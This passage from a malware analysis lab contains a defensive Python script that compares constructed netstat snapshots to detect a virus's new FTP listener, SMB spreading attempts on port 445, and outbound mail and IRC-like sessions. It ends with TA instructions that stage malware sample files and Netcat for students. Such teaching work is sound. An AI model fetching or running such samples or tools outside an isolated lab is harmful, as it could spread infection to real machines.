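The port-level checks behind A3.8 and the Q4 answers, as an added example that is not part of the original lab: a Python script that parses `netstat -an` output and compares a clean baseline against a later snapshot to find a new listener (the virus's FTP server on a random port), a burst of half-open connections to one remote port (the port 445 spreading attempts), and established outbound sessions to mail and other unexpected ports. Both snapshots, including every address and port in them, are constructed for the example.

```python
"""Added example, not part of the original lab: the port-level checks behind
A3.8 and the Q4 answers, run over constructed `netstat -an` output. A baseline
snapshot is compared against a later one to find a new listener, a burst of
half-open connections to one remote port, and outbound sessions to mail and
other unexpected ports. All addresses and ports below are made up."""
import re
from collections import Counter

# One row of `netstat -an`: proto, local addr:port, foreign addr:port, [state]
_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)\s*(\S*)\s*$")


def parse_netstat(text):
    """Parse netstat -an output into a list of dicts (UDP rows have an empty state)."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            proto, laddr, lport, raddr, rport, state = m.groups()
            rows.append({"proto": proto, "laddr": laddr, "lport": int(lport),
                         "raddr": raddr, "rport": rport, "state": state})
    return rows


def listeners(rows):
    """(proto, port) pairs something is bound to: TCP LISTENING rows and all UDP rows."""
    return {(r["proto"], r["lport"]) for r in rows
            if r["state"] == "LISTENING" or r["proto"] == "UDP"}


def new_listeners(baseline_rows, current_rows):
    """A3.8: ports that are open now but were not in the baseline."""
    return sorted(listeners(current_rows) - listeners(baseline_rows))


def spreading_attempts(rows, remote_port="445", threshold=10):
    """Q4.6/Q4.7 signature: many half-open (SYN_SENT) connections to the same
    remote port, i.e. a worm probing other hosts for SMB. Returns (flag, count)."""
    count = sum(1 for r in rows if r["proto"] == "TCP"
                and r["rport"] == remote_port and r["state"] == "SYN_SENT")
    return count >= threshold, count


def outbound_by_port(rows):
    """Q4.8/Q4.9: established sessions grouped by remote port. On a workstation,
    port 25 means the machine is sending mail itself; a long-lived session to a
    high, non-standard port is what to open in Ethereal, since IRC on a random
    port cannot be identified by port number alone."""
    return Counter(r["rport"] for r in rows if r["state"] == "ESTABLISHED")


# Constructed snapshots: a clean XP machine, and the same machine after the
# Section 4 sample has run (new FTP listener, SMB probing, SMTP and IRC sessions).
BASELINE = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
"""

INFECTED = BASELINE + (
    "  TCP    0.0.0.0:36276          0.0.0.0:0              LISTENING\n"
    + "".join(f"  TCP    10.0.0.5:{1031 + i}          10.0.0.{10 + i}:445          SYN_SENT\n"
              for i in range(12))
    + "  TCP    10.0.0.5:1044          192.0.2.10:25          ESTABLISHED\n"
    + "  TCP    10.0.0.5:1045          198.51.100.7:48275     ESTABLISHED\n"
)


def report(baseline_text=BASELINE, current_text=INFECTED):
    """Run all three checks and return their findings as one dict."""
    before, after = parse_netstat(baseline_text), parse_netstat(current_text)
    flagged, n = spreading_attempts(after)
    return {"new_listeners": new_listeners(before, after),
            "spreading": flagged, "syn_sent_to_445": n,
            "outbound": dict(outbound_by_port(after))}


if __name__ == "__main__":
    print(report())
```

Run against real output, the baseline should be taken from the clean VM image before the sample is executed; the comparison is only as good as the snapshot it starts from, which is the same lesson the registry half of this lab teaches.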
  • 34. Lab instructions for TA
Create a virtual machine image of Windows XP with Service Pack 2 and put it on the NAS for this lab. Also make sure the following files are available for download on the NAS server:
  - Regmon.exe
  - Jpfwall.exe
  - HiddenFolder - folder containing:
      - Infect.bat
      - RenameMe.exe
  - Netcat
  - ZSNES.zip
  - installer.c
  - server.c
  - VCToolkitSetup
  - dbg_x86_6.4.7.2
Make sure all other files included with the lab are copied to the NAS server.